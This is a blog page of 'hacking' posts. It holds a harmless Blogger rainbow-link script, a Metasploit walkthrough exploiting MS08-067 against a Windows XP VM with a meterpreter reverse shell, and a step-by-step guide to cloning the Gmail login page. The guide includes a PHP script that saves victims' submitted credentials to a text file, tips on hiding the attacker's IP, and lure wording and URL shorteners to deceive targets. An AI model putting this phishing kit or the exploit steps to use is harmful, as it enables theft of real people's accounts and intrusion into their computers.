TITLE OF WEBSITE

HACKS BY MUHIB DON

Sunday, 30 December 2012

How to Add Rainbow Color Effect Links to Blogger


Rainbow color effect will give random colors to your link on mouse hover. Normally seen on mouse hover only a single color changes. But thanks to Dynamic Drive now we can easily 
change several colors of our links. Once the code is applied to the blog/website, all links on each page exhibit a rainbow effect on mouse hover. This tutorial is very simple to follow and uses a JavaScript code inside Blogger.

To add Rainbow effect link to your blog/website follow some easy steps below:

STEP #1: Login to Blogger

STEP #2: Go to Dashboard>Template

STEP #3: Click on Edit HTML>Proceed

STEP #4: Press ( Ctrl+f ) to search for the below code.

</head>

STEP #5: And just above </head> paste the code below

<script type='text/javascript'>
//<![CDATA[
var rate = 20;
if (document.getElementById) 
window.onerror=new Function("return true")
var objActive;  // The object which event occured in 
var act = 0;    // Flag during the action 
var elmH = 0;   // Hue 
var elmS = 128; // Saturation 
var elmV = 255; // Value 
var clrOrg;     // A color before the change 
var TimerID;    // Timer ID
if (document.all) { 
    document.onmouseover = doRainbowAnchor; 
    document.onmouseout = stopRainbowAnchor; 
} 
else if (document.getElementById) { 
    document.captureEvents(Event.MOUSEOVER | Event.MOUSEOUT); 
    document.onmouseover = Mozilla_doRainbowAnchor; 
    document.onmouseout = Mozilla_stopRainbowAnchor; 
}
function doRainbow(obj) 
{ 
    if (act == 0) { 
        act = 1; 
        if (obj) 
            objActive = obj; 
        else 
            objActive = event.srcElement; 
        clrOrg = objActive.style.color; 
        TimerID = setInterval("ChangeColor()",100); 
    } 
}

function stopRainbow() 
{ 
    if (act) { 
        objActive.style.color = clrOrg; 
        clearInterval(TimerID); 
        act = 0; 
    } 
}

function doRainbowAnchor() 
{ 
    if (act == 0) { 
        var obj = event.srcElement; 
        while (obj.tagName != 'A' && obj.tagName != 'BODY') { 
            obj = obj.parentElement; 
            if (obj.tagName == 'A' || obj.tagName == 'BODY') 
                break; 
        }
        if (obj.tagName == 'A' && obj.href != '') { 
            objActive = obj; 
            act = 1; 
            clrOrg = objActive.style.color; 
            TimerID = setInterval("ChangeColor()",100); 
        } 
    } 
}

function stopRainbowAnchor() 
{ 
    if (act) { 
        if (objActive.tagName == 'A') { 
            objActive.style.color = clrOrg; 
            clearInterval(TimerID); 
            act = 0; 
        } 
    } 
}

function Mozilla_doRainbowAnchor(e) 
{ 
    if (act == 0) { 
        obj = e.target; 
        while (obj.nodeName != 'A' && obj.nodeName != 'BODY') { 
            obj = obj.parentNode; 
            if (obj.nodeName == 'A' || obj.nodeName == 'BODY') 
                break; 
        }
        if (obj.nodeName == 'A' && obj.href != '') { 
            objActive = obj; 
            act = 1; 
            clrOrg = obj.style.color; 
            TimerID = setInterval("ChangeColor()",100); 
        } 
    } 
}

function Mozilla_stopRainbowAnchor(e) 
{ 
    if (act) { 
        if (objActive.nodeName == 'A') { 
            objActive.style.color = clrOrg; 
            clearInterval(TimerID); 
            act = 0; 
        } 
    } 
}

function ChangeColor() 
{ 
    objActive.style.color = makeColor(); 
}

function makeColor() 
{ 
    // Don't you think Color Gamut to look like Rainbow?
    // HSVtoRGB 
    if (elmS == 0) { 
        elmR = elmV;    elmG = elmV;    elmB = elmV; 
    } 
    else { 
        t1 = elmV; 
        t2 = (255 - elmS) * elmV / 255; 
        t3 = elmH % 60; 
        t3 = (t1 - t2) * t3 / 60;
        if (elmH < 60) { 
            elmR = t1;  elmB = t2;  elmG = t2 + t3; 
        } 
        else if (elmH < 120) { 
            elmG = t1;  elmB = t2;  elmR = t1 - t3; 
        } 
        else if (elmH < 180) { 
            elmG = t1;  elmR = t2;  elmB = t2 + t3; 
        } 
        else if (elmH < 240) { 
            elmB = t1;  elmR = t2;  elmG = t1 - t3; 
        } 
        else if (elmH < 300) { 
            elmB = t1;  elmG = t2;  elmR = t2 + t3; 
        } 
        else if (elmH < 360) { 
            elmR = t1;  elmG = t2;  elmB = t1 - t3; 
        } 
        else { 
            elmR = 0;   elmG = 0;   elmB = 0; 
        } 
    }
    elmR = Math.floor(elmR).toString(16); 
    elmG = Math.floor(elmG).toString(16); 
    elmB = Math.floor(elmB).toString(16); 
    if (elmR.length == 1)    elmR = "0" + elmR; 
    if (elmG.length == 1)    elmG = "0" + elmG; 
    if (elmB.length == 1)    elmB = "0" + elmB;
    elmH = elmH + rate; 
    if (elmH >= 360) 
        elmH = 0;
    return '#' + elmR + elmG + elmB; 
}
//]]>
</script>

Customization:

You can change the value of var rate = 20. This controls the speed with which links change color.

So execute steps correctly and you are done. Head to your blog and check the trick executed. So don't forget us. We will only survive with your generosity. Like, Share, Follow and Subscribe. If you are facing any problem with implementing these codes just comment below for help. Stay tuned for more posts.

Friday, 28 December 2012

Hacking Windows XP Using Backtrack


In this article i am going to demonstrate how to hack a remote computer by exploiting the  parsing flaw in the pathcanonicalization code of NetAPI32.dll through the Server Service(CVE-2008-4250). Before we jump into the actual exploitation process, let me give more details about this Server Service Vulnerability.


Details about Server Service Vulnerability(MS08-067):
 

Microsoft Windows Server service provides support for sharing resources such as files and print services over the network.

The Server service is vulnerable to a remote code-executionvulnerability. The vulnerability is caused due to an error innetapi32.dll when processing directory traversal character sequences in path names. This can be exploited to corrupt stack memory by e.g. sending RPC requests containing specially crafted path names to the Server Service component. The 'NetprPathCanonicalize()' function in the 'netapi32.dll' file is affected.

A malicious request to vulnerable system results in complete compromise of vulnerable computers.
This vulnerability affects Windows XP, Windows 2000, Windows Server 2003, Windows Vista, and Windows Server 2008. But Attackers require authenticated access on Windows Vista and Server 2008 platforms to exploit this issue.


Exploiting the MS08-067 using Metasploit:

Requirements:

  •     VirtualBox

  •     Backtrack 5

  •     Target OS(XP)


Step 1:

Create Two Virtual Machine(VM) namely "Target" and "BT5".  Install the XP inside Target VM and Backtrack inside BT5. Start the Two VMs.



Step 2: Find the IP address of Target

 

Open The command prompt in the Target machine(XP). Type "ipconfig" to find the IP address of the Target system.

 

Step 3: Information Gathering
 

Now let us collect some information about the Target machine.  For this purpose , we are going to use the nmap tool.

Open The Terminal in the BT5 machine(Backtrack) and type "nmap -O 192.168.56.12".  Here 192.168.56.12 is IP address of Target machine. If you look at the result, you can find the list of open ports and OS version.



 Step 4: Metasploit
 

Now open the Terminal in the BT5 machine(Backtrack) and Type "msfconsole".

The msfconsole is the most popular interface to the Metasploit Framework. It provides an "all-in-one" centralized console and allows you efficient access to virtually all of the options available in the Metasploit Framework.

Let us use the Search command to find the exploit modules with the keyword netapi. Type "search netapi".  Now you can see the list of modules match with the netapi.



We are going to exploit MS08-067 , so type "use exploit/windows/smb/ms08_067_netapi".

Step 5: Set Payload
 

As usual, let use the Reverse Tcp Payload for this exploit also. Type "set payload windows/meterpreter/reverse_tcp" in the msfconsole.

Step 6: Options
 

Type "set LHOST 192.168.56.10".  Here 192.168.56.10 is IP address of Backtrack machine.  You can find the ip address by typing 'ifconfig' command in the Terminal.

Type "set RHOST 192.168.56.12".  Here 192.168.56.12 is IP address of Target machine.










Step 7: Exploiting
 

Ok, it is time to exploit the vulnerability, type "exploit" in the console. If the exploit is successful, you can see the following result.












Now we can control the remote computer using the meterpreter. For example, typing "screenshot" will grab the screenshot of the victim system.


I hope you understand and enjoy this...........................

How to Crack Passwords With C-Force

This summary is not available. Please click here to view the post.

E-mail Hacking



Today I will explain you how to create fake or phishing web page for gmail. This Procedure can be used to make fake page for other websites like yahoo, msn or any other sites which you want to steal the password of particular user.

Steps for Creating Phishing or Fake web Page:

Step 1:

Go to the gmail.com.  Save the Page as "compelete HTML" file

Step 2:

Once you save the login page completely, you will see a HTML file and a folder with the name something like Email from google files.There will be two image files namely "google_transparent.gif", "mail_logo.png"

Step3:

 Upload those image to tinypic or photobucket.  copy the url of each image.

Step4:

Open the HTML file in Wordpad.

Search for "google_transparent.gif" (without quotes) and replace it with corresponding url .

Search for "mail_logo.png" (without quotes) and replace it with corresponding url .

Step 5:

Search for the

 action="https://www.google.com/accounts/ServiceLoginAuth"

Replace it with

action="http://yoursite urlhere/login.php"

 save the file.

Step6:

Now you need to create login.php

 so you need to open the notepad and type as

Code:

<?php

header("Location: https://www.google.com/accounts/ServiceLoginAuth ");

$handle = fopen("password.txt", "a");

foreach($_GET as $variable => $value) {

fwrite($handle, $variable);

fwrite($handle, "=");

fwrite($handle, $value);

fwrite($handle, "\r\n");

}

fwrite($handle, "\r\n");

fclose($handle);

exit;

?>

save it

Step 7:


open the notepad and just save the file as "password.txt" without any contents.

Now upload those three files(namely index.html, login.php, password.txt) in any of subdomain Web hosting site.
 

Note:  that web hosting service must has php feature.
 

Use one of these sites:

110mb.com

spam.com

 justfree.com 

or 

007sites.com 

use this sites through the secure connection sites(so that you can hide your ip address)  like: http://flyproxy.com .  find best secure connection site.


Step 8:


create an email with gmail keyword.
 like : gmailburger@gmail.com

Step 9:

Send to victim similar  to " gmail starts new feature to use this service log in to this page" from that gmail id with link to your phishing web page.



 Note:


For user to believe change Your phishing web page url with any of free short url sites.
Like : co.nr, co.cc, cz.cc 
This will make users to believe that it is correct url.

Ready Made phishing files:

.::Download::.

I hope you enjoy this..........................